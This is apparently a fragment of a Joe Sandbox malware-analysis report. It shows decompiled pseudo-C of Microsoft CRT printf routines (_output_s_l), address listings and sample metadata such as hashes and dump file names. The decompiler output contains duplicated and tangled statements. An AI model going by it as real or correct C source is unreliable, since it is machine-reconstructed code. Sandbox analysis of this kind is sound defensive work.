    															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    																 *(__ebp - 0x1c) = 0;
    															}
    															__eax = __ebp - 0x49;
    															 *(__ebp - 4) = __ebp - 0x49;
    															while(1) {
    																L181:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L183;
    																}
    																L182:
    																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    																	goto L186;
    																}
    																L183:
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__ecx =  *(__ebp - 0x2bc);
    																__edx =  *(__ebp - 0x2c0);
    																__eax = E00B855B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
    																 *(__ebp - 0x2ac) = __eax;
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__eax =  *(__ebp - 0x2bc);
    																__ecx =  *(__ebp - 0x2c0);
    																 *(__ebp - 0x2c0) = E00B85630( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
    																 *(__ebp - 0x2bc) = __edx;
    																__eflags =  *(__ebp - 0x2ac) - 0x39;
    																if( *(__ebp - 0x2ac) > 0x39) {
    																	__edx =  *(__ebp - 0x2ac);
    																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
    																	__eflags = __edx;
    																	 *(__ebp - 0x2ac) = __edx;
    																}
    																__eax =  *(__ebp - 4);
    																__cl =  *(__ebp - 0x2ac);
    																 *( *(__ebp - 4)) = __cl;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																L181:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L183;
    																}
    																goto L182;
    															}
    														}
    														L168:
    														__eflags =  *(__ebp - 0x2b8);
    														if( *(__ebp - 0x2b8) >= 0) {
    															goto L170;
    														}
    														goto L169;
    													}
    												case 0xe:
    													while(1) {
    														L190:
    														if( *(_t627 - 0x28) != 0) {
    															goto L216;
    														}
    														goto L191;
    													}
    											}
    										case 8:
    											L30:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    											goto L33;
    										case 9:
    											L31:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											goto L33;
    										case 0xa:
    											L29:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000001;
    											 *(__ebp - 0x10) = __ecx;
    											goto L33;
    										case 0xb:
    											L28:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											goto L33;
    										case 0xc:
    											L32:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000008;
    											__eflags = __ecx;
    											 *(__ebp - 0x10) = __ecx;
    											goto L33;
    										case 0xd:
    											L33:
    											goto L218;
    									}
    								} else {
    									if(0 == 0) {
    										 *(_t627 - 0x314) = 0;
    									} else {
    										 *(_t627 - 0x314) = 1;
    									}
    									_t574 =  *(_t627 - 0x314);
    									 *(_t627 - 0x278) =  *(_t627 - 0x314);
    									if( *(_t627 - 0x278) == 0) {
    										_push( &M00B77C38);
    										_push(0);
    										_push(0x460);
    										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    										_push(2);
    										_t529 = L00B7D760();
    										_t630 = _t630 + 0x14;
    										if(_t529 == 1) {
    											asm("int3");
    										}
    									}
    									L14:
    									if( *(_t627 - 0x278) != 0) {
    										goto L16;
    									} else {
    										 *((intOrPtr*)(L00B80C60(_t574))) = 0x16;
    										E00B809F0(_t558, _t574, _t625, _t626,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    										 *(_t627 - 0x2f0) = 0xffffffff;
    										E00B7C650(_t627 - 0x40);
    										_t502 =  *(_t627 - 0x2f0);
    										goto L229;
    									}
    								}
    							}
    							L219:
    							if( *(_t627 - 0x25c) == 0) {
    								L222:
    								 *(_t627 - 0x334) = 1;
    								L223:
    								_t561 =  *(_t627 - 0x334);
    								 *(_t627 - 0x2e0) =  *(_t627 - 0x334);
    								if( *(_t627 - 0x2e0) == 0) {
    									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    									_push(0);
    									_push(0x8f5);
    									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    									_push(2);
    									_t507 = L00B7D760();
    									_t630 = _t630 + 0x14;
    									if(_t507 == 1) {
    										asm("int3");
    									}
    								}
    								if( *(_t627 - 0x2e0) != 0) {
    									 *(_t627 - 0x300) =  *(_t627 - 0x24c);
    									E00B7C650(_t627 - 0x40);
    									_t502 =  *(_t627 - 0x300);
    								} else {
    									 *((intOrPtr*)(L00B80C60(_t561))) = 0x16;
    									E00B809F0(_t558, _t561, _t625, _t626, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    									 *(_t627 - 0x2fc) = 0xffffffff;
    									E00B7C650(_t627 - 0x40);
    									_t502 =  *(_t627 - 0x2fc);
    								}
    								goto L229;
    							}
    							L220:
    							if( *(_t627 - 0x25c) == 7) {
    								goto L222;
    							}
    							L221:
    							 *(_t627 - 0x334) = 0;
    							goto L223;
    						}
    					} else {
    						L116:
    						 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    						__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    						 *(__ebp - 0x2f8) = 0xffffffff;
    						__ecx = __ebp - 0x40;
    						__eax = E00B7C650(__ecx);
    						__eax =  *(__ebp - 0x2f8);
    						L229:
    						return E00B805D0(_t502, _t558,  *(_t627 - 0x48) ^ _t627, _t598, _t625, _t626);
    					}
    					L118:
    					if(( *(_t627 - 0x10) & 0x00000020) == 0) {
    						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
    					} else {
    						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
    					}
    					 *(_t627 - 0x28) = 1;
    					goto L190;
    				}
    			}
















    0x00b95447
    0x00b95447
    0x00b95447
    0x00b9544b
    0x00b95450
    0x00b95453
    0x00b95460
    0x00000000
    0x00000000
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954bd
    0x00b95505
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00b959fc
    0x00b95a02
    0x00b95a0c
    0x00b95a21
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a4c
    0x00b95a58
    0x00b95a6e
    0x00b95a73
    0x00b95a73
    0x00b95a89
    0x00b95a8e
    0x00b95a97
    0x00b95a9f
    0x00b95ab5
    0x00b95aba
    0x00b95aba
    0x00b95a9f
    0x00b95ac1
    0x00b95b95
    0x00b95ba8
    0x00b95bad
    0x00000000
    0x00b95ac7
    0x00b95ac7
    0x00b95acb
    0x00000000
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95ade
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95afc
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b13
    0x00b95b32
    0x00b95b37
    0x00b95b3a
    0x00b95b49
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b61
    0x00b95b58
    0x00b95b5f
    0x00b95b6d
    0x00b95b86
    0x00b95b8b
    0x00000000
    0x00b95b8b
    0x00000000
    0x00b95b5f
    0x00b95b93
    0x00b95bb0
    0x00b95bb7
    0x00b95bbf
    0x00b95bd5
    0x00b95bda
    0x00b95bda
    0x00b95bbf
    0x00b95bb7
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bee
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e53
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94eba
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f7e
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fde
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff2
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b95037
    0x00b9503a
    0x00b9505a
    0x00b9505d
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504b
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b9508f
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e5
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95116
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95144
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b9514f
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515a
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95165
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95170
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517b
    0x00b9517e
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95122
    0x00b95125
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b95125
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f1
    0x00b950f4
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00b95108
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b6
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b9519e
    0x00b951a1
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951d1
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959ac
    0x00b959af
    0x00b959b2
    0x00b959b5
    0x00b959b8
    0x00b959bb
    0x00b959c1
    0x00b959c1
    0x00b959c1
    0x00b959c9
    0x00b959cd
    0x00000000
    0x00000000
    0x00b959cf
    0x00b959cf
    0x00b959d2
    0x00b959d5
    0x00b959d5
    0x00b959da
    0x00b959dd
    0x00b959e0
    0x00b959e3
    0x00b959e6
    0x00b959e9
    0x00b959ec
    0x00b959ec
    0x00b959ef
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b951d7
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951ee
    0x00b951f4
    0x00b951f6
    0x00b951f9
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b9532e
    0x00b95333
    0x00b95335
    0x00b95338
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00000000
    0x00000000
    0x00b95295
    0x00b95295
    0x00b952a1
    0x00b952a7
    0x00b952ae
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c5
    0x00b952d1
    0x00b95326
    0x00000000
    0x00b95326
    0x00b952b0
    0x00b952b0
    0x00b952b6
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00000000
    0x00b952df
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b9556e
    0x00b95572
    0x00b9557d
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d2
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b9564f
    0x00b95655
    0x00b95657
    0x00b9565b
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9565b
    0x00b9567d
    0x00b95684
    0x00b95687
    0x00b9568c
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956bb
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cc
    0x00b956cf
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b959f2
    0x00b95583
    0x00b95583
    0x00b9558a
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b9524f
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b956e9
    0x00b956ec
    0x00b956ef
    0x00b956f2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b9574c
    0x00b9574c
    0x00b95756
    0x00b95756
    0x00b9575c
    0x00b9575e
    0x00b95761
    0x00b95761
    0x00b95767
    0x00b95767
    0x00000000
    0x00000000
    0x00b95704
    0x00b95704
    0x00000000
    0x00000000
    0x00b95341
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95414
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95421
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b95436
    0x00b9543c
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b5
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c2
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00000000
    0x00000000
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00b95888
    0x00b95888
    0x00b9588e
    0x00b95894
    0x00b9589a
    0x00000000
    0x00b95848
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00000000
    0x00b95851
    0x00b95851
    0x00b9585c
    0x00b95862
    0x00b95864
    0x00b9586a
    0x00b9586d
    0x00b9586f
    0x00b95875
    0x00b9587e
    0x00b95883
    0x00b958a0
    0x00b958a3
    0x00b958a3
    0x00b958a8
    0x00b958ad
    0x00b958ad
    0x00b958b3
    0x00b958b5
    0x00b958bb
    0x00b958c1
    0x00b958c1
    0x00b958ca
    0x00b958ca
    0x00b958b3
    0x00b958d0
    0x00b958d4
    0x00b958e2
    0x00b958e5
    0x00b958e8
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b958fe
    0x00b958fe
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b9590d
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00b95923
    0x00b95929
    0x00b95929
    0x00b9592f
    0x00000000
    0x00000000
    0x00b95931
    0x00b95931
    0x00b95934
    0x00b95937
    0x00b9593e
    0x00b95945
    0x00b9594d
    0x00b95953
    0x00b95956
    0x00b95959
    0x00b95960
    0x00b9596c
    0x00b95972
    0x00b95978
    0x00b9597f
    0x00b95981
    0x00b95987
    0x00b95987
    0x00b9598d
    0x00b9598d
    0x00b95993
    0x00b95996
    0x00b9599c
    0x00b959a1
    0x00b959a4
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00000000
    0x00b95921
    0x00b95913
    0x00b95853
    0x00b95853
    0x00b9585a
    0x00000000
    0x00000000
    0x00000000
    0x00b9585a
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00000000
    0x00b94e02
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c1b
    0x00b95c25
    0x00b95c25
    0x00b95c2b
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b95c06
    0x00b95c0d
    0x00000000
    0x00000000
    0x00b95c0f
    0x00b95c0f
    0x00000000
    0x00b95c0f
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b9550a
    0x00b95510
    0x00b95530
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00000000
    0x00b95532

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 2357813345-2363074782
    • Opcode ID: ec3d0c025527b6ab16467f3ac26934ecf9c98518cf8526f86492d41c224aaeae
    • Instruction ID: 8c8886b95aaaa97ec921265afc2f8fe234d284ffc766c771086e5c60066aaf34
    • Opcode Fuzzy Hash: ec3d0c025527b6ab16467f3ac26934ecf9c98518cf8526f86492d41c224aaeae
    • Instruction Fuzzy Hash: 22A168B09856288BDF35DF54CC89BEEB7F1EB48304F2481E9E4196A291E7709E80CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00B967BA(void* __eflags) {
    				signed int* _t482;
    				signed int _t486;
    				void* _t491;
    				signed int _t493;
    				void* _t501;
    				void* _t519;
    				signed int _t523;
    				void* _t534;
    				signed int _t576;
    				void* _t598;
    				void* _t599;
    				signed int _t600;
    				void* _t602;
    				void* _t603;
    
    				L0:
    				while(1) {
    					L0:
    					_t482 = E00B93D50(_t600 + 0x14);
    					_t603 = _t602 + 4;
    					 *(_t600 - 0x484) = _t482;
    					if(E00B97280() != 0) {
    						goto L115;
    					}
    					L106:
    					__ecx = 0;
    					if(0 == 0) {
    						 *(__ebp - 0x4f4) = 0;
    					} else {
    						 *(__ebp - 0x4f4) = 1;
    					}
    					__edx =  *(__ebp - 0x4f4);
    					 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    					if( *(__ebp - 0x488) == 0) {
    						_push(L"(\"\'n\' format specifier disabled\", 0)");
    						_push(0);
    						_push(0x695);
    						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    						_push(2);
    						__eax = L00B7D760();
    						__esp = __esp + 0x14;
    						if(__eax == 1) {
    							asm("int3");
    						}
    					}
    					if( *(__ebp - 0x488) != 0) {
    						L114:
    						while(1) {
    							L187:
    							if( *(_t600 - 0x28) != 0) {
    								goto L212;
    							}
    							L188:
    							if(( *(_t600 - 0x10) & 0x00000040) != 0) {
    								if(( *(_t600 - 0x10) & 0x00000100) == 0) {
    									if(( *(_t600 - 0x10) & 0x00000001) == 0) {
    										if(( *(_t600 - 0x10) & 0x00000002) != 0) {
